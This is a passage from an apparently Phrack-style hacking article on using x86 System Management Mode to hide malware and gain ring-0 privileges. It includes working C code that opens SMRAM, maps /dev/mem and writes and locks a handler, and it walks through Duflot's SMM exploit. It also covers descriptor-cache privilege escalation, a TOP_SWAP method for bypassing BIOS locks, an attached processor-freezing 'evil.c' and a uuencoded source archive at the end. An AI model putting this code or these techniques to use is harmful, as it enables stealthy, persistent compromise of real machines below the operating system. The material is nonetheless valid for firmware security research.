+located in the 0x1FFFF bytes starting at SMBASE (it may be bigger if the 
+system activates Extented SMRAM).
+
+The default value of SMBASE is 0x30000, but since modern chipsets offer
+relocation, it's commonly seen as 0xA0000 (BIOS relocates it to the same
+memory-mapped base address used by the I/O ports of the video card).
+
+As spotted by Duflot, the memory controller hub has a control register 
+called SMRAM Control Register that offers a bit (D_OPEN - bit 6) that, when
+it's set, makes all memory accesses to the address space starting at SMBASE
+be redirected to SMRAM.
+
+If the processor is not in the SMM mode and the D_OPEN bit is not set, all 
+accesses to the SMRAM memory range are forwarded to the video card (when it
+have been relocated to the shared address as said) - giving a protection to
+the SMRAM, which we will use later to protect the malware).  Else, if the 
+D_OPEN bit is set, the memory addressed will be the SMRAM.  
+
+Another important thing he showed concerning the handler is the bit number 
+4 (D_LCK) of the SMRAM Control Register, which, when set, protects the 
+SMRAM control register and thus, the SMRAM memory itself, if the D_OPEN bit
+was not set at the time the control register was locked. To change it, the
+system needs to reboot (which gives us a challenge, since most modern BIOS
+will lock it).
+
+It's well detailed in the Intel Manuals, but the fact that a super-user
+could write to it using the video device and then force a SMI to be 
+triggered was really new.
+
+When entering the SMM the processor will jump to the pysical address
+SMBASE+0x8000 (which means that the SMI handler must be located at the 
+offset 0x8000 inside the SMRAM). Since when the D_OPEN bit is set we can 
+put some code in the SMRAM, we just need to force an SMI trigger to get 
+our code executed.
+
+                 -----------------
+SMBASE+0x1FFFF  |                 |
+                |                 |
+                |                 |
+                |                 |
+SMBASE+0xFFFF    -----------------
+                |                 |
+                | State save area |
+                |                 |
+SMBASE+0xFE00    -----------------
+                |                 |
+                | Code,Heap,Stack |
+                |                 |
+SMBASE+0x8000    ----------------- ----> First SMI Handler instruction
+                |                 |
+                |                 |
+                |                 |
+SMBASE=0xA0000   -----------------
+
+
+---[ 2.2.2 - SMI handler
+
+Since we will set the D_OPEN bit we need some way to avoid the display 
+usage, since all access to the video memory will be forwarded to SMRAM and 
+not to the video card. Duflot does not explain how it is possible, since 
+his sample was for OpenBSD and it assumed there was no one using the video
+card (he showed an exploit for an OpenBSD problem but as a requisite, 
+there is no one using the X, for example).
+
+In our samples, we will also show how to manipulate the registers directly,
+but we will use the libpci [4] to guarantee no problems with this (since 
+the libpci uses the system interfaces to manipulate the PCI subsystem 
+avoiding race conditions in the resource usage).  It's also more portable,
+because libpci as we will show supports a lot of different operating 
+systems.
+
+So, to insert the handler the attacker needs to:
+	- Verify if the D_LCK bit is not set
+	- Set the D_OPEN bit
+	- Have access to the memory address space (in the sample,
+          0xA0000-0xBFFFF)
+
+To access the memory we can just mmap the memory range using the /dev/mem 
+device, because it provides access to the physical address space 
+(instead of the virtual vision provided by the /dev/kmem for example).
+
+---[ 2.2.3 - SMI Triggering
+
+Since the SMI signal is a hardware-generated interrupt there is no 
+instruction to generate it by software. The chipset may generate it, but 
+_when_ it does depends on the chipset [5][6].
+
+Duflot also already explained in his paper the SMI_EN register, where the 
+least significant bit is a global enable, specifying whether SMIs are 
+enabled or not (the other bits of SMI_EN then control which devices can 
+generate an SMI).
+
+The SMI_STS register keeps track of which device last caused an SMI.
+
+These registers can be accessed using the regular PCI mechanisms ("in" and
+"out"). The position of those register are variable, but they are in a
+relative address to PMBASE (SMI_EN=PMBASE+0x30 and SMI_STS=PMBASE+0x34).
+
+The PMBASE can be accessed using bus 0, device 0x1F, function 0 and offset 
+0x40.
+
+More details of the PCI configuration mechanisms in the section 2.3.1.
+
+
+---[ 2.2.4 - Duflot discovery - Exploit
+
+In his paper Duflot & friends showed a working exploit against OpenBSD.  
+This will be our first code to be analyzed (also attached with small 
+modifications to work on Linux).
+
+As can be seen, the code will have problems if there is an X Server running
+,since it just forwards all video memory access to the SMRAM.
+
+Since the Linux operating system (as most of unixes) provides a way to rise
+the I/O privilege level in the user-mode, the exploit is using that in a 
+way it can use the instructions in/out:
+
+        if(iopl(3) < 0) {
+
+To get access to the SMRAM, the D_OPEN bit must be set:
+	outl(data1, 0xcf8);
+        outl(data2, 0xcfc);
+
+Also here, we can easily see that, in the handler, it is doing the 
+following:
+
+        addr32 mov $test, %eax
+	mov %eax, %cs:0xfff0
+
+Here we have that the offset 0xfff0 is the saved EIP in the saved-state map
+inside the SMRAM. By doing so, it is just putting the address of a function
+in the saved-state map, so when the system triggers the rsm instruction 
+it will return to protected mode, but now executing the test() function 
+(the saved EIP).
+
+Duflot discovered that accessing the Programmed I/O Port 0xB2 with the bit 
+5 of SMI_EN set will generate an SMI:
+
+        outl(0x0000000f, 0xb2);
+
+For sure it's really funny... but what else can be done with that?
+
+
+---[ 2.3 - Duflot misses
+
+In his paper Duflot does not explain how the PCI Configuration really works
+(for example, he just pointed to use the port 0xCF8 for address and port 
+0xCFC to perform the operation itself). Also, he never said when and why 
+the system generates a SMI.  The idea of use the SMM to manipulate the 
+system memory can also be really expanded, to create a malware running 
+inside the SMM, or to bypass boot-protections and many others (like create 
+a system protection mechanism running on it).
+
+The rest of this chapter and the next one will show many details about how
+the SMM works and what we can use inside the SMM.  Also, will better
+explain how to analyse the system and create a portable library to 
+manipulate the SMM-related registers.
+
+
+---[ 2.3.1 - PCI Configuration
+
+The original PCI specification [11] defined two mechanisms for i386 PCs, 
+but later specifications deprecated one of these ways. Since this 
+specification is not free, we highly recommend you to read a book about 
+that [12].
+
+Basically, you have two I/O port ranges: one associated to the address port
+(0xCF8-0xCFB) and the other to the data port (0xCFC-0xCFF).
+
+To configure a device, you must write to the address port which device and
+register you want to access and then read/write the data from/to the data
+port.
+
+The rule about the format of the data written to the address port is as 
+following:
+
+Bits    Description
+0..1    00b (always 0)
+2..7    Which 32-bit space in the config space to access
+8..10   Device function
+11..15  Device Number
+
+A complete list of PCI vendors and devices can be found in [13].
+
+PCI devices have an address which is broken down into a PCI-bus number, a
+device number within that bus (values 0-31), and a function number within
+the device (values 0-7).
+
+Since a single sample is more valuable, to access a register REG in the 
+bus:device:function PCI space you will need to use the following address:
+	0x80000000L | ((bus & 0xFF) << 16) |
+		((((unsigned)device) & 0x1F) << 11) |
+		((((unsigned)func) & 0x07) << 8) | (REG & 0xFC);
+
+In each PCI device's configuration space there's normally one or more
+BARs (Base Address Registers), which can be used to set or find the address
+in physical memory or in I/O space of each resource the card uses.
+
+---[ 2.3.2 - When and why the system generates a SMI
+
+All memory transactions (read/write memory access) from the CPU are placed 
+on the host bus to be consumed by some device.
+
+Potentially the CPU itself would decode a range (of memory) such as the 
+Local APIC range, and the transaction would be satisfied before needing 
+to be placed on the external bus at all.
+
+If the CPU does not claim the transaction (don't decode), then it must be
+sent out.  In a typical Intel architecture, the transaction would next be 
+decoded by the MCH (Memory Controller Hub) and be either claimed as an 
+address that the MCH owns, or it's determining based on decoders that the 
+transaction is not owned by the MCH and thus should be forwarded on to the 
+next possible device in the chain.
+
+If the memory controller does not find the address to be within actual 
+DRAM, then it looks to see if it falls within one of the other I/O ranges 
+it owns (ISA, EISA, PCI).
+
+Depending on how old the system is, the memory controller may directly 
+decode PCI transactions (instead of pass that to the I/O bridges), for 
+example.
+
+If the MCH determines that the transaction does not belong to it, the
+transaction will be forwarded down to whatever I/O bridge(s) may be present
+in the system.  This process of decoding for ownership / response or 
+forwarding down if not owned repeats until the system runs out of potential
+agents.
+
+The final outcome is either an agent claims the transaction and returns
+whatever data is present at the address, or no one claims the address and
+an abort occurs to the transaction, typically resulting in 0FFFFFFFFh data
+being returned.
+
+In some situations (Duflot paper's case), some addresses (for example those
+falling within the 0A0000h - 0BFFFFh range) are owned by two different 
+devices (VGA frame buffer and system memory).  This will force the 
+architecture to send a SMI signal to satisfy the transaction.
+
+If no SMI is asserted, then the transaction is ultimately passed over by
+the memory controller, so that the VGA controller (if present) can claim 
+it.
+
+If the SMI signal is asserted when the transaction is received by the 
+memory controller, then the transaction will be forwarded to the DRAM 
+unit for fetching the data from physical memory (executing our handler).
+
+---[ 2.4 - SMM Internals - Our first experiences
+
+Here we will clarify some important details about SMM and how it works. 
+This will be important to better understand the attached library.
+
+---[ 2.4.1 - Analyzing the SMM registers
+
+Let's start by analyzing the SMM using libpci, so we can have more 
+stability doing this.
+
+The following code is known to work fine in ICH5 and ICH3M controllers.  
+
+---   code   ---
+
+#include <stdio.h>
+#include <pci/pci.h>
+#include <sys/io.h>
+
+/* Defines - bit positions (will be used in more samples) */
+#define D_OPEN_BIT      (0x01 << 6)
+#define D_CLS_BIT       (0x01 << 5)
+#define D_LCK_BIT       (0x01 << 4)
+#define G_SMRAME_BIT    (0x01 << 3)
+#define C_BASE_SEG2_BIT (0x01 << 2)
+#define C_BASE_SEG1_BIT (0x01 << 1)
+#define C_BASE_SEG0_BIT (0x01)
+
+/* Function to print SMRAM registers */
+void show_smram(struct pci_dev* SMRAM)
+{
+	u8 smram_value;
+
+	/* Provided by libpci */
+        smram_value = pci_read_byte(SMRAM, SMRAM_OFFSET);
+
+	if(smram_value & D_OPEN_BIT) {
+                printf("D_OPEN_BIT:      1\n");
+        } else {
+                printf("D_OPEN_BIT:      0\n");
+        }
+        if(smram_value & D_CLS_BIT) {
+                printf("D_CLS_BIT:       1\n");
+        } else {
+                printf("D_CLS_BIT:       0\n");
+        }
+        if(smram_value & D_LCK_BIT) {
+                printf("D_LCK_BIT:       1\n");
+        } else {
+                printf("D_LCK_BIT:       0\n");
+        }
+        if(smram_value & G_SMRAME_BIT) {
+                printf("G_SMRAME_BIT:    1\n");
+        } else {
+                printf("G_SMRAME_BIT:    0\n");
+        }
+        if(smram_value & C_BASE_SEG2_BIT) {
+                printf("C_BASE_SEG2_BIT: 1\n");
+        } else {
+                printf("C_BASE_SEG2_BIT: 0\n");
+	}
+        if(smram_value & C_BASE_SEG1_BIT) {
+                printf("C_BASE_SEG1_BIT: 1\n");
+        } else {
+                printf("C_BASE_SEG1_BIT: 0\n");
+        }
+        if(smram_value & C_BASE_SEG0_BIT) {
+                printf("C_BASE_SEG0_BIT: 1\n");
+        } else {
+                printf("C_BASE_SEG0_BIT: 0\n");
+        }
+        printf("\n");
+}
+
+int main(void) {
+        struct pci_access *pacc;
+        struct pci_dev *SMRAM;
+
+	/* Provided by libpci */
+        pacc = pci_alloc();
+        pci_init(pacc);
+
+        SMRAM = pci_get_dev(pacc, 0, 0, 0, 0);
+
+        printf("Current status of SMRAM:\n");
+        show_smram(SMRAM);
+
+        printf("Setting D_OPEN to 1\n");
+        pci_write_byte(SMRAM, SMRAM_OFFSET, 0x4a);
+        show_smram(SMRAM);
+
+        printf("Locking SMRAM\n");
+        pci_write_byte(SMRAM, SMRAM_OFFSET, 0x1a);
+        show_smram(SMRAM);
+
+        printf("Trying to set D_OPEN to 0\n");
+        pci_write_byte(SMRAM, SMRAM_OFFSET, 0x0a);
+        show_smram(SMRAM);
+
+        return 0;
+}
+
+--- end code ---
+
+Compile this using:
+	gcc -o brazil_smm1 brazil_smm1.c -lpci -lz
+
+An execution sample:
+
+rrbranco:~/Phrack# ./brazil_smm1
+Current status of SMRAM:
+D_OPEN_BIT:      0
+D_CLS_BIT:       0
+D_LCK_BIT:       0
+G_SMRAME_BIT:    0
+C_BASE_SEG2_BIT: 0
+C_BASE_SEG1_BIT: 0
+C_BASE_SEG0_BIT: 0
+
+Setting D_OPEN to 1
+D_OPEN_BIT:      1
+D_CLS_BIT:       0
+D_LCK_BIT:       0
+G_SMRAME_BIT:    0
+C_BASE_SEG2_BIT: 0
+C_BASE_SEG1_BIT: 0
+C_BASE_SEG0_BIT: 0
+
+Locking SMRAM
+D_OPEN_BIT:      1
+D_CLS_BIT:       0
+D_LCK_BIT:       1
+G_SMRAME_BIT:    0
+C_BASE_SEG2_BIT: 0
+C_BASE_SEG1_BIT: 0
+C_BASE_SEG0_BIT: 0
+
+Trying to set D_OPEN to 0
+D_OPEN_BIT:      1
+D_CLS_BIT:       0
+D_LCK_BIT:       1
+G_SMRAME_BIT:    0
+C_BASE_SEG2_BIT: 0
+C_BASE_SEG1_BIT: 0
+C_BASE_SEG0_BIT: 0
+
+
+---[ 2.4.2 - SMM Details
+
+When the processor enters the SMM mode it will signal an output pin, 
+aSMIACT#, to notify the chipset that the processor is in the SMM.
+
+The SMI interrupt itself can be triggered anytime, except while the 
+processor is already in SMM (of course). This will cause the SMM handler to
+be executed (as we already showed).
+
+Since the SMIACT# was noticed by the chipset, all further memory accesses 
+will be redirected to the SMRAM protected memory. After that, the processor
+will start to save its internal state in the saved_state map area, inside
+the SMRAM. Then, the handler starts to execute.
+
+What is the current state? The processor is in a 'real mode', with all 
+segments containing 4GB limit and being readable/writable.
+
+As said, to leave the SMM, the RSM instruction is issued by the handler, 
+and  then the processor reads the saved-state map again, performing just 
+some checks on it (that's good) restoring the system to the previouas 
+situation.
+
+SMM writes data in the saved-state map exactly in the same way as the stack
+does, from top to bottom beginning from the SMBASE register (thus, 
+permiting relocation). It's important to keep this in mind when 
+manipulating the saved-state map.
+
+If the system enters SMM by result of a halt or I/O instruction, the 
+handler can tell the system to continue the execution after that or to 
+enter the halt state just setting a flag in the saved-state map.
+
+Upon entrance in SMM the interrupts are disabled (including the 
+asyncronous NMI (Non Maskable Interrupt) and INIT), and the IDT (interrupt
+description table)  register keeps it's value. In order to service 
+interrupts inside SMM (a motivation for that will be showed),  one needs to
+setup an own interrupt vector [14] and reload the IDT with your new value,
+since the values contained in the old IDT are no longer valid in the 
+address space used by SMM.
+
+After the STI instruction, the system start to receive some interrupts 
+but will  still miss the asyncronous ones. To enable that is needed to
+issue the IRET/IRETD instructions.
+
+The big concern about re-enabling interrupts inside the SMM handler is that
+if an NMI interrupt is received while inside the handler, it will be 
+latched. So, potentially any verification done inside the SMM handler can 
+be bypassed if someone hooked the NMI handler routine (this routine would
+be executed  immediately after the RSM, before the processor starts 
+executing the code pointed by the EIP in the saved-state map).
+
+During our tests, SMM relocation gave us some problems in older machines 
+(pentium II/III).  Also, we preferred to use those machines to test our 
+things, since there is no SMM locking being done by the BIOS (generally 
+saying, BIOS older than 2 years).
+
+Apparently, those older processors had a fixed CS value point to 0x30000 
+(the default SMM position - relocated by most of modern BIOS to 0xA0000 as 
+we already said).
+
+If we enable interrupts inside the SMM, when an interrupt is invoked, it 
+will save CS:IP in the stack for further return. But it will use the fixed 
+value of CS (0x30000) instead of using the SMBASE value, not reflecting 
+the  right code segment that the SMM is actually using and, therefore, the 
+code will return to the wrong location.
+
+Also, the Intel documentation mentions alignment problems in the SMBASE 
+value in older processors (previously to PIV).
+
+------[ 3 - SMM for evil purposes
+
+As already said, the SMM can be used to modify kernel internal structures.
+
+Here we will also show some challenges and other possible uses for a 
+malware code running inside the SMM.
+
+---[ 3.1 - Challenges
+
+---[ 3.1.1 - Cache-originated overwrites
+
+When entering the SMM, the SMRAM may be overwritten by data in the cache 
+if a #FLUSH occur after the SMM entrance.
+
+To avoid that we can shadow SMRAM over non-cacheable memory or assert 
+#FLUSH simultaneously to #SMI events (#FLUSH will be served first). 
+Most BIOS mark the SMRAM range as non-cacheable for us (and also locks it, 
+since Duflot paper publication).
+
+---[ 3.1.2 - SMM Locking
+
+Most BIOS manufacturers lock the SMM nowadays. When you are inserting a
+protecting mechanism using the SMM you can just replace the system BIOS 
+for an open-source one (see LinuxBIOS [7]).
+
+When we are talking about malicious code, this cannot be done and some 
+kind of BIOS patching must take place.
+
+This article is focusing in the SMM manipulation itself, but a good 
+approach to bypass the BIOS protection is to use the TOP_SWAP [8] bit to 
+execute our code before the original BIOS code and then load our SMM 
+handler and lock it (this will prevent the original BIOS to overwrite our 
+SMM handler).
+
+Basicaly this bit is used to define if the system will use the first 64K 
+or the second one as area to load the BIOS from.  Knowing that, someone 
+can just set the TOP_SWAP bit, put own code in the second 64K area and in 
+the code jump back to the original BIOS code.  This code will be runned 
+BEFORE the BIOS.
+
+The TOP_SWAP bit exists to provide a secure way to BIOS update - the BIOS 
+code is copied to the second 64K, the TOP_SWAP bit is set, the update is 
+done and an integrity check is performed - if there is anything that makes
+the system to reboot, it will restart in the second 64K which holds a copy
+of the original BIOS without any problems.
+
+---[ 3.1.3 - Portability
+
+As said, the SMM is harware-dependent, more specifically it's 
+ICH-dependent.
+
+The attached code is know to work in ICH5 and ICH3M, tested under Linux, 
+but since it uses the libpci, it's supposed to work also in FreeBSD, 
+NetBSD, OpenBSD (also tested on it), Solaris, Aix, GNU/Hurd and Windows).
+
+To provide support to other ICHs one must edit the libSMM.h header file to 
+specify the correct location of the bus, device, function and offset and 
+then be sure the PMBASE returned by the function get_pmbase() is right 
+(comparing to the manuals).
+
+After that, verify if the SMRAM_OFFSET is correctly defined (you can get 
+that in your I8xx manuals).  If so, the bits in the SMRAM control register 
+will be correctly showed (you can easily test it using the D_LCK bit, since
+when set will not permit any other bit to be manipulated).  One can also
+test it using the dd command showed next in this article and the D_OPEN bit
+(use the open_smram function, write to the SMRAM memory mmap'ing it and 
+then dump it to verify if it's working).
+
+---[ 3.1.4 - Address translation
+
+Address translation is a great difficulty when we are inside our handler, 
+since we need the value of the CR3 register (which we can get from the 
+saved-state map) to manually parse the page tables and then perform the 
+actual translation.
+
+Another approach is to just transfer the control back to our code in the 
+same way that Duflot did, but we need to save the current processor 
+status inside SMM, so after the execution of our code (after the SMM) we 
+can transfer the control back to the process that was executing before 
+triggering the SMI (else we would have some portions of the system just 
+stopping to work after our malware get executed).
+
+This is not good... 
+
+The best thing that we can do is just have a simple handler that gives the
+biggest privilege level of execution to the calling code (i.e. the code 
+that was executing before the SMI) and then return. By doing so, we avoid 
+to stay too much time in the SMM context and don't need to care about 
+stopped OS processes.
+
+In the next sections we clarify how to put code in the SMM space, test it 
+and then an approach using the descriptor caches to provide the above 
+statement.
+
+
+---[ 3.2 - Copying our code in the SMM space
+
+---[ 3.2.1 - Testing
+
+So, the first step to put some code in the SMM is to open the SMRAM by 
+setting the D_OPEN bit.
+
+---   code   ---
+pci_write_byte(smram_dev, SMRAM_OFFSET, (current_value | D_OPEN_BIT));
+--- end code ---
+
+To close it after we finish, we will use the following:
+
+---   code   ---
+pci_write_byte(smram_dev, SMRAM_OFFSET, (current_value & ~D_OPEN_BIT));
+--- end code ---
+
+Also, after inserting our code, we want to lock SMRAM access, avoiding 
+anyone from changing the SMM-related registers.
+
+---   code   ---
+pci_write_byte(smram_dev, SMRAM_OFFSET, (current_value | D_LCK_BIT));
+--- end code ---
+
+In order to get our code inserted in the SMRAM memory, we need to map it, 
+in the same way we did in the exploit.
+
+---   code   ---
+fd = open(MEMDEV, O_RDWR);
+
+if(fd < 0) {
+	fprintf(stderr, "Opening %s failed, errno: %d\n", MEMDEV, errno);
+	return -1;
+}
+
+vidmem = mmap(NULL, MAPPEDAREASIZE, PROT_READ | PROT_WRITE, MAP_SHARED,
+		fd, SMIINSTADDRESS);
+
+if(vidmem == MAP_FAILED) {
+	fprintf(stderr, "Could not map memory area, errno: %d\n", errno);
+	return -1;
+}
+close(fd);
+
+/* Here we are copying our code to the SMRAM memory */
+if(vidmem != memcpy(vidmem, handler, endhandler-handler)) {
+	fprintf(stderr, "Could not copy asm to memory...\n");
+	return -1;
+}
+
+if(munmap(vidmem, MAPPEDAREASIZE) < 0) {
+	fprintf(stderr, "Could not release mapped area, errno: %d\n", errno);
+	return -1;
+}
+--- end code ---
+
+It's a good idea to verify if it's working properly, and also make a 
+previous copy of your SMRAM memory contents before that.
+
+So, let's do that using dd:
+	dd if=/dev/mem of=my_smram bs=1 skip=`expr 655360 - 1` count=64K
+
+P.S.:  655360 is 0xa0000 in decimal (as spotted by Duflot, SMM is commonly
+relocated to that address instead 0x30000, as in the default case)
+
+---[ 3.2.2 - Descriptor caches
+
+This idea worked in some system and not in some others, since the Intel
+documentation is not exactly clever about this subject.
+
+From the Intel manual: "Every segment register has a visible part and a 
+hidden part (The hidden part is sometimes referred to as a descriptor 
+cache or a shadow register).  When a segment selector is loaded into the 
+visible part of a segment register, the processor also loads the hidden 
+part of the segment register with the base address, segment limit, and 
+access control information from the segment descriptor pointed to by the 
+segment selector."
+
+"Access control information" is refering to the well know xPL:
+	- RPL -> Request privilege level
+	- CPL -> Current privilege level
+	- DPL -> Descriptor privilege level
+
+In the saved-state map inside the SMRAM, also according to the Intel 
+manuals, are saved the descriptor caches and the CR4 register (the manual 
+says it's not readable and write to this values will cause an 
+"unpredictable behavior").
+
+We found the following:
+
+TSS Descriptor Cache (12-bytes) - Offset: FFA7
+IDT Descriptor Cache (12-bytes) - Offset: FF9B
+GDT Descriptor Cache (12-bytes) - Offset: FF8F
+LDT Descriptor Cache (12-bytes) - Offset: FF83
+GS  Descriptor Cache (12-bytes) - Offset: FF77
+FS  Descriptor Cache (12-bytes) - Offset: FF6B
+DS  Descriptor Cache (12-bytes) - Offset: FF5F
+SS  Descriptor Cache (12-bytes) - Offset: FF53
+CS  Descriptor Cache (12-bytes) - Offset: FF47
+ES  Descriptor Cache (12-bytes) - Offset: FF3B
+
+The saved-state map is stored at SMBASE + 0xFE00 to SMBASE + 0xFFFF.
+
+Modifying the DPL field of the SS descriptor cache from 3 to 0 gives ring0
+power to our program (and a General Protection Fault in newer processors).
+
+---[ 3.2.3 - Code relocation
+
+SMM has the ability to relocate its protected memory space. The SMBASE 
+value saved in the state save map may be modified. This value is read 
+during the RSM instruction. When SMM is next entered, the SMRAM will be
+located at this new address.
+
+From our SMM handler, in the saved-state map, we can modify this value (at
+offset 0xFEF8 from SMBASE). To perform that, we must care about CS 
+adjustments inside our code.
+
+It can be used to relocate the SMRAM to memory area of our choosing and 
+trick those who try to dump the SMRAM for analysis using the standard 
+SMBASE values (anyway, since our malware is locking the SMM and clearing 
+the D_OPEN bit, we don't need to use this technique).
+
+
+------[ 4 - SMM Manipulation Library
+
+The SMM Manipulation Library attached in this article provides an easy 
+way to create portable code to manipulate the SMRAM control register.
+
+It offers the following methods:
+	u8 show_smram  (struct pci_dev* smram_dev, u8 bits_to_show)
+		It's used to test if specific bits are set or not
+		The pci_dev structure are optional, NULL can be passed.
+
+	u16 get_pmbase (void)
+		Internally used by the library to manipulate the SMI-enablement.
+		Exported by the function to turn easy to an external program
+		verify the correct offsets for the SMI_EN and SMI_STS.
+
+	u16 get_smi_en_iop (void)
+		Return the location of the SMI_EN
+
+	u16 get_smi_sts_iop (void)
+		Return the location of the SMI_STS
+
+	int enable_smi_gbl (u16 smi_en_iop)
+		Enable SMI globally
+
+	int disable_smi_gbl (u16 smi_en_iop)
+		Disable SMI globally
+
+	int enable_smi_on_apm (u16 smi_en_iop)
+		Enable SMI on APM events
+
+	int disable_smi_on_apm (u16 smi_en_iop)
+		Disable SMI on APM events
+
+	int open_smram(void)	
+		Open SMRAM for access (set D_OPEN bit)
+
+	int close_smram(void)
+		Close SMRAM for access (unset D_OPEN bit)
+
+	int lock_smram(void)
+		Lock the SMRAM (set D_LCK bit)
+
+	void write_to_apm_cnt(void)
+		Write to the APM CNT (generate a SMI)
+
+Also, the include file libSMM.h contains the valid values to be used to 
+locate related registers and bit's for the SMM manipulation, like the 
+device, function bus and offsets.  It contains specify defines for 
+interesting bits inside the SMRAM control register too, like the D_OPEN 
+and the D_LCK.
+	
+Attached to the article is also the file libSMM_test.c showing how to use 
+the SMM Manipulation Library.  This program will basically set and unset 
+all control registers that will affect the SMM manipulation.  It can be 
+used to test if the library is working propertly in your hardware and 
+since it will also test the D_LCK bit, one need to reboot after run this 
+program.
+
+The evil.c code also attached will use the SMM Manipulation Library to 
+insert a small SMM handler that freezes the processor.
+
+------[ 5 - Future and other uses
+
+We can't foresee the future, but modern rootkits are becoming much more
+targeted, so this kind of deeper hackishs will start to be more widely 
+seen.
+
+Also, with new platforms to BIOS enhancements, like the Extensible Firmware
+Interface, everything that depends on boot patching will be easier [9].
+
+Another important thing to notice is the virtualization resources that 
+exist nowadays and some possibilities of using them in implementations of 
+hardware protected integrity-check systems [10].
+
+------[ 6 - Acknowledgments
+
+A lot of people helped us in the long way these researches that resulted in
+something funny to be published, you all know who you are.
+
+Special tks to twiz and the Phrack Staff for the great review of the 
+article, giving a lot of important insights about how to better structure 
+it and giving a real value to it.
+
+Finally, big tks to Julio Auto for the review of the article drafts.
+
+BSDaemon:
+Conference organizers who invited me to talk about protection
+mechanisms using SMM (yeah, a lot of fun in completely different cultures).
+
+To my girlfriend who waited for me (alone, I suppose) during this travels.
+
+RISE Security (http://www.risesecurity.org) for always keeping me motivated
+studying completely new things.
+
+------[ 7 - References
+
+[1]  - Intel Architecture Reference Manuals
+      http://www.intel.com/products/processor/manuals/index.htm
+
+[2]  - Loic Duflot, Daniel Etiemble, Olivier Grumelard, "Using CPU System
+Management Mode to Circumvent Operating System Security Functions"
+      Proceedings of CanSecWest, 2006
+
+[3]  - Branco, Rodrigo Rubira, "KIDS - Kernel Intrusion Detection System"
+      Hackers to Hackers Conference, 2007
+
+[4]  - LibPCI for Linux
+      ftp://ftp.kernel.org/pub/software/utils/pciutils/
+
+[5]  - Intel 82801 BA-I/O Controler HUB (ICH2) Datasheet
+      http://www.intel.com/design/chipsets/datashts/290687.htm
+
+[6]  - Intel 82845 Memory Controler HUB (MCH) Datasheet
+      http://www.intel.com/design/chipsets/datashts/290725.htm
+
+[7]  - LinuxBIOS
+      http://freshmeat.net/projects/linuxbios
+
+[8]  - Bing, Sun, "BIOS Boot Hijacking By Using Intel ICHx "Top-Block Swap"
+Mode"
+      XFocus Information Security Conference, 2007
+
+[9]  - Heasman, John, "Hacking the Extensible Firmware Interface"
+      Blackhat Las Vegas Briefings, 2007
+
+[10] - Branco, Rodrigo Rubira, "StMichael Project"
+      http://stjude.sf.net
+
+[11] - PCI Specification
+      http://www.pcisig.com
+
+[12] - Shanley, Tom; Anderson, Don; "PCI System Architecture" 
+      Mindshare Inc
+      ISBN 0-201-30974-2 
+      Publisher: Addison Wesley
+
+[13] - PCI Database
+      http://www.pcidatabase.com
+
+[14] - devik & sd; "Linux on-the-fly kernel patching without LKM"
+      Phrack 58
+
+------[ 8 - Sources - Implementation details [brazil_SMM.tgz]
+
+Attached a GPLed library that will help you to manipulate the SMM-related
+features, accompanied by some programs displaying sample usage.
+
+Further updates will be available in the StMichael project website, at:
+        http://stjude.sf.net
+
+
+begin 644 brazil_SMM.tgz
+M'XL(`-M5[D<``^Q;VW+;2)+UZU3L1U3HI:4(FFWY.MU^HB3*XHY$JDG*;CUM
+M@$211!L$."A`,O?K]V1F%5#@Q9[9F-Z(B5C%],@B"EE9>3V9E9P5T7\GZ7]-
+M[NY^?O%G_;S"SX=W[^CW^8=WK\+?_N?%^:L/']Z\???Z_?OW+UZ=O_[PYLT+
+M_>Y/XRCXJ6P9%5J_*&9%E,WSH^M^]/S?]&?6Z#]-9G^.#?SS^G_S[M7Y_^O_
+M_^)G1_^WR=QDUOQK]R`%OW_[UNM[Y_?;-^=P=NC__5L8Q9L/KTG_[]^^>Z%?
+M_6O9./Q3ZS_/R^^M^]'S?].?O_Q%X^?3\$%_Z@_[X]ZMOG^XN!U<:OS7'T[Z
+M2A;@Y[,I;))G^G5'_V>5&7W^RR_G2NG+?+,MDN6JU*>79_CPK[]T^)&^+HS1
+MDWQ1/D>%T==YE<51"0(=/<CF7:4/_[RC%Z/L:YID>E)V]'6R*%?Z.LWSHJ,O
+M<EL2@;N>UJ]>GY^_>GG^YM6YU@^3GM+])U-L<S"66+TQQ3HI2Q/K,M=S<*BC
+M+-9Q8LLBF56ET5@[`S=K>I@8JW2^T.4*;Z;B`#K.Y]7:9.``Z_5\%67+)%OJ
+MI"3R65[J*$WS9Q-W%23$(KHO3+2>I08RT=.5\92L7N2%7H-S;;TPZ+_8V&29
+M"8=E]!4?/D=;O<VK0BT@N3A?TQ.[XO5@GEG`X<JNUA=;\)V5163!7XF]6'\F
+M,T64ZOMJAJV5\V1B-\E*D\6RU;**(-X2JJ&M]/>VHF?*\_SR)9:LB4];81EM
+M6A\'6]!:/BC$`AZMKBS,I4N22*QJLZ8]:]%FDT+XM#G+AW5@VH:C&L/YR082
+MS/@T4;;5.=XI]*;(ET6TUL^KG"A7Y2HO+*2TAAU@I:JLJ`\LG4[RM7&O'3/2
+MUN'F.<P%XIMME1?V;8+`66SUD9,EF2U-%'?/M'[,*SV/,C[L5@LS+'K'L84&
+M\[Q+5O-E93+]#,%N3/25I,%2]9QTZ!%Q5)B%*0HZ#B3@%-@AFU2;`OOCA".0
+M/\R9W;.]4*=125:A5M&3:#BPCL!WQ&7V^-.GSG:*)9N"8G^"&3QA:YTLB+1^
+M3NSJK%-OA;/,3?)$1*IB3J1C:*9@@2T-?*U4_D48+?X,7J4USE);UHC787P:
+M/,Z%2R*2Z<P\"[]>[A_%B#RYKUG^7-.-<Z)IB3+D;%D[TYQ>+<V\%-?AH&=9
+M*YD)9%D8DM2<K,@*>0ACEL0*QDKAB81I,G9UMXE0(L;)I.U7>9235@IRW((/
+M**NZ:BKOM':!2]LT*IGXW!1EA`-CQ08/DUF2)F7BXA!1%HFJ@QH-)=DACISX
+MUWF<+,A\6137>&"^1>M-BD5NQ4%RMIJO=.1%#EFM#+F=PE]EPB?FF*$7!H1X
+M'Z1CO4R<_<$Z$I#*(!R**XT46*[D1IILM2M>QN_NF#->V;*#=6I3"\P+3U5@
+M>:#3@TG4?-@53`)KUMX8D%4H!C%5,1C\*RF45PWYL#ED);![9+'R&3HMS<;^
+MJD_/SS@O2>9L2QUFJ4Y?GT%^\'-G)D%F>EXE$"K)R/+#U"SAYISQ+"=HE_(Z
+MH89!\V=.0ZS&<#_FNI=:2(AT82+2&(=/Q%MW%*)*SH(#B<&S-WJ#=P:G6.#&
+M9^&*#!?8*HMMK0H)IUF.]PO*0EO>DD_72C90Q&"QEV.8^83C,#Y?&]K%I%:2
+MP2:R%H\('3P;Y:*%#2T([#J5@9EG;QQL0#ZGTXXY5))D4=K!'G(D2C(0!%+[
